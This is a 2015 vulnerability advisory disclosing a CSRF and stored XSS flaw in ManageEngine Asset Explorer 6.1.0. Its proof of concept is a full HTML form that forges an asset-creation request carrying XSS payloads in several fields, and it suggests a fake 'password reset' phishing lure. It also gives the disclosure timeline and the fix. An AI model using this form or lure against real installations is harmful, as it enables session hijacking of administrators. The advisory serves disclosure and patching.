CSRF/XSS In Manage Engine Asset Explorer

2015-05-11T00:00:00
ID SECURITYVULNS:DOC:32060
Type securityvulns
Reporter Securityvulns
Modified 2015-05-11T00:00:00

Description

=============================================================================== CSRF/Stored XSS Vulnerability in Manage Engine Asset Explorer ===============================================================================

. contents:: Table Of Content

Overview

  • Title :CSRF/Stored XSS vulnerability in Manage Engine Asset Explorer
  • Author: Kaustubh G. Padwad
  • Plugin Homepage: https://www.manageengine.com/products/asset-explorer/
  • Severity: HIGH
  • Version Affected: Version 6.1.0 Build: 6110
  • Version Tested : Version 6.1.0 Build: 6110
  • version patched:
  • CVE ID : Description ===========

Vulnerable Parameter

  • Too many parameters (All Device properties)

About Vulnerability

This Product is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can execute arbitrary code into Asset list(AssetListView.do). Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc.

Vulnerability Class

Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)

Steps to Reproduce: (POC)

  • Add follwing code to webserver and send that malicious link to application Admin.
  • The admin should be loggedin when he clicks on the link.
  • Soical enginering might help here

For Example :- Device password has been changed click here to reset

##############CSRF COde

<html> <body> <form action="http://192.168.1.25:8080/AssetDef.do" method="POST"> <input type="hidden" name="typeId" value="3" /> <input type="hidden" name="ciTypeId" value="11" /> <input type="hidden" name="ciId" value="null" /> <input type="hidden" name="ciName" value="&lt;div/onmouseover=&apos;alert(1)&apos;&gt; style=&quot;x:&quot;&gt;" /> <input type="hidden" name="assetName" value="&lt;div/onmouseover=&apos;alert(1)&apos;&gt; style=&quot;x:&quot;&gt;" /> <input type="hidden" name="componentID" value="3" /> <input type="hidden" name="CI_NetworkInfo_IPADDRESS" value="127.0.0.1" /> <input type="hidden" name="CI_RouterCI_NVRAMSIZE" value="12" /> <input type="hidden" name="CI_RouterCI_DRAMSIZE" value="12" /> <input type="hidden" name="CI_RouterCI_FLASHSIZE" value="12" /> <input type="hidden" name="CI_RouterCI_OSTYPE" value="12" /> <input type="hidden" name="CI_RouterCI_CPU" value="12" /> <input type="hidden" name="CI_RouterCI_ESTIMATEDBW" value="12" /> <input type="hidden" name="CI_RouterCI_OSVERSION" value="12" /> <input type="hidden" name="CI_RouterCI_FIRMWAREREVISION" value="12" /> <input type="hidden" name="CI_RouterCI_CPUREVISION" value="12" /> <input type="hidden" name="CI_RouterCI_CONFIGREGISTER" value="12" /> <input type="hidden" name="CI_NetworkInfo_IPNETMASK" value="12" /> <input type="hidden" name="CI_NetworkInfo_MACADDRESS" value="12" /> <input type="hidden" name="CI_BaseElement_IMPACTID" value="1" /> <input type="hidden" name="ciDescription" value="&lt;div/onmouseover=&apos;alert(1)&apos;&gt; style=&quot;x:&quot;&gt;" />

  &lt;input type=&quot;hidden&quot; name=&quot;activeStateId&quot; value=&quot;2&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;isStateChange&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;resourceState&quot; value=&quot;1&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;assignedType&quot; value=&quot;Assign&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;asset&quot; value=&quot;0&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;user&quot; value=&quot;0&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;department&quot; value=&quot;0&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;leaseStart&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;leaseEnd&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;site&quot; value=&quot;&#45;1&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;location&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;vendorID&quot; value=&quot;0&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;assetPrice&quot; value=&quot;21&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;assetTag&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;acqDate&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;assetSerialNo&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;expDate&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;assetBarCode&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;warrantyExpDate&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;depreciationTypeId&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;declinePercent&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;usefulLife&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;depreciationPercent&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;salvageValue&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;isProductInfoChanged&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;assetID&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;previousSite&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;addAsset&quot; value=&quot;Save&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;purchasecost&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;modifycost&quot; value=&quot;true&quot; /&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;oldAssociatedVendor&quot; value=&quot;&quot; /&gt;
  &lt;input type=&quot;submit&quot; value=&quot;Submit request&quot; /&gt;
&lt;/form&gt;

</body>

Mitigation

Update to version 6.1

Change Log

https://www.manageengine.com/products/asset-explorer/sp-readme.html

Disclosure

30-March-2015 Reported to Developer 27-April-2015 Fixed By Vendor credits ======= Kaustubh Padwad Information Security Researcher kingkaustubh@me.com https://twitter.com/s3curityb3ast http://breakthesec.com https://www.linkedin.com/in/kaustubhpadwad